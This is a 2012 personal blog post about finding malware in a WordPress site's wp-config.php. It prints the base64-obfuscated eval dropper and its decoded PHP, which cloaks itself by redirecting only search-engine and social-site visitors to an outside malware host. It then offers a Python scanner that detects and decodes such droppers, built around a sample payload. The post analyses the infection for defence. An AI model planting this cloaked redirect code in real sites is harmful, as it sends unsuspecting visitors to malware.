Tanky Woo

My Blog Got Infected With Malware

24 Feb 2012
This post was migrated from my old WordPress blog; the content may contain conversion glitches.

First of all, thanks to the Party, thanks to the people, and thanks to whoever planted the malware on my site.

When I opened the blog this evening, Chrome showed me this:

[Image: "Tragedy 1" (the Chrome malware warning)]

OK, so I'd been hacked: the warning said the site was serving malware. I clicked through to the Safe Browsing diagnostic page, then dug around in Google Webmaster Tools, which said the malware had been detected on Feb 23. So I opened FTP, went through the blog's files and looked for anything modified on Feb 23. Nothing. Then I looked at files modified on the 24th: only .htaccess and sitemap.xml, and both checked out clean.

orz. So I kept searching on Baidu, downloaded the theme and everything else to check locally, and went through it all looking specifically for injected iframes, JS and the like, but still couldn't find anything wrong.

At that point I took the site that Google's warning named as the malware host, searched for it on Google, opened a few dozen results, and eventually stumbled on this blog post. Thanks to that guy; otherwise it would never have occurred to me that wp-config.php could be the infected file.

I opened wp-config.php and, sure enough, there was a big, conspicuous chunk of eval code. Here it is:

```php
eval(base64_decode("DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vZnJvbGluZy5iZWUucGwvIik7DQpleGl0KCk7DQp9DQp9DQp9DQp9"));
```

After decoding:

```php
error_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
    $referer=$_SERVER['HTTP_REFERER'];
    $uag=$_SERVER['HTTP_USER_AGENT'];
    if ($uag) {
        if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler")
            or stristr($referer,"gogo") or stristr($referer,"live.com") or stristr($referer,"aport")
            or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru")
            or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com")
            or preg_match("/yandex\.ru\/yandsearch\?(.*?)\&lr\=/",$referer)
            or preg_match ("/google\.(.*?)\/url/",$referer)
            or stristr($referer,"myspace.com") or stristr($referer,"facebook.com") or stristr($referer,"aol.com")) {
            if (!stristr($referer,"cache") or !stristr($referer,"inurl")){
                header("Location: http://froling.bee.pl/");
                exit();
            }
        }
    }
}
```

And there it was, that conspicuous website. fuck the website! Note what the code does: it only redirects visitors whose Referer says they came from a search engine or a social site (and whose Referer does not contain "cache" or "inurl"). Anyone typing the URL directly, including the site owner, is served the normal page, which is exactly why the site looked clean to me no matter how many times I opened it.

Finally, I checked the modification time of my wp-config.php: Feb 14. In other words it had been compromised long before; Google just hadn't detected it until now!!!!

Then I checked the other blog I host on the same shared virtual host, and, even worse, it had been compromised earlier still, back on Jan 30....
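To save the next person the FTP-and-eyeballs search described above, here is a small scanner, added as an example for this post and not part of the original or of WordPress. It walks a site tree, finds every `eval(base64_decode("..."))` in a .php file, decodes the blob, and pulls out the indicators that matter for this family of infection: the redirect target in `header("Location: ...")`, the `stristr($referer, ...)` strings that trigger the cloaked redirect, and the `!stristr(...)` exclusions. The sample site it builds in a temp directory (`build_sample_site`, `SAMPLE_PAYLOAD`, the host `malware.example`) is constructed for the demo, modelled on the payload above but shortened; the regexes and record layout are my own choices.

```python
"""Find eval(base64_decode(...)) droppers in a WordPress tree, decode them,
and extract the indicators a responder cares about."""
import base64
import os
import re
import tempfile
from typing import Dict, List

# eval(base64_decode("...")) with optional whitespace and either quote style.
EVAL_B64 = re.compile(
    r'''eval\s*\(\s*base64_decode\s*\(\s*["']([A-Za-z0-9+/=\s]+)["']\s*\)\s*\)''')
# header("Location: http://...") inside the decoded payload.
REDIRECT = re.compile(r'''header\s*\(\s*["']Location:\s*([^"']+)["']''', re.I)
# stristr($referer,"yahoo") triggers vs. !stristr($referer,"cache") exclusions.
TRIGGER = re.compile(r'''(?<!!)stristr\s*\(\s*\$referer\s*,\s*["']([^"']+)["']''')
EXCLUDE = re.compile(r'''!stristr\s*\(\s*\$referer\s*,\s*["']([^"']+)["']''')


def decode_payloads(php_source: str) -> List[Dict]:
    """Return one record per eval(base64_decode()) found in php_source."""
    findings = []
    for m in EVAL_B64.finditer(php_source):
        blob = re.sub(r"\s+", "", m.group(1))   # tolerate line-wrapped blobs
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:                       # binascii.Error is a ValueError
            decoded = ""
        redirect = REDIRECT.search(decoded)
        findings.append({
            "offset": m.start(),
            "decoded": decoded,
            "redirect": redirect.group(1).strip() if redirect else None,
            "triggers": sorted(set(TRIGGER.findall(decoded))),
            "exclusions": sorted(set(EXCLUDE.findall(decoded))),
        })
    return findings


def scan_tree(root: str) -> List[Dict]:
    """Walk root, decode every dropper in every .php file, attach path and mtime."""
    results = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                source = fh.read()
            for finding in decode_payloads(source):
                finding["path"] = os.path.relpath(path, root)
                # mtime is reported for context only: an attacker can reset it.
                finding["mtime"] = os.path.getmtime(path)
                results.append(finding)
    return results


# Constructed stand-in for the payload found on this blog: same shape
# (referer-gated redirect), shortened, with a placeholder host.
SAMPLE_PAYLOAD = (
    'error_reporting(0);\n'
    'if (!headers_sent()) {\n'
    '  $referer=$_SERVER["HTTP_REFERER"];\n'
    '  if (stristr($referer,"yahoo") or stristr($referer,"bing") '
    'or preg_match("/google\\.(.*?)\\/url/",$referer)) {\n'
    '    if (!stristr($referer,"cache")) {\n'
    '      header("Location: http://malware.example/"); exit();\n'
    '    }\n'
    '  }\n'
    '}\n'
)


def build_sample_site(root: str) -> None:
    """Write one clean file and one infected wp-config.php (constructed data)."""
    os.makedirs(os.path.join(root, "wp-content"), exist_ok=True)
    with open(os.path.join(root, "wp-content", "index.php"), "w", encoding="utf-8") as fh:
        fh.write("<?php\n// Silence is golden.\n")
    blob = base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()
    with open(os.path.join(root, "wp-config.php"), "w", encoding="utf-8") as fh:
        fh.write('<?php\neval(base64_decode("' + blob + '"));\n'
                 'define("DB_NAME", "wordpress");\n')


def demo() -> List[Dict]:
    """Build the sample tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_site(root)
        return scan_tree(root)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['path']} @{f['offset']}: redirect={f['redirect']} "
              f"triggers={f['triggers']} exclusions={f['exclusions']}")
        print(f["decoded"])
```

Point it at a real site with `scan_tree("/path/to/wordpress")`. Two caveats from this incident: filter on the decoded content, not on mtime, since the attacker controls mtime and a "modified on the 23rd" search is exactly what missed the Feb 14 infection; and check every site on the same shared host, because the second blog here had been carrying the same dropper since Jan 30.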

I went through a lot of sites while sorting this out; these were the useful ones:

http://www.zhanggang.net/wap/index-wap2.php?p=40250

http://www.stopbadware.org/home/security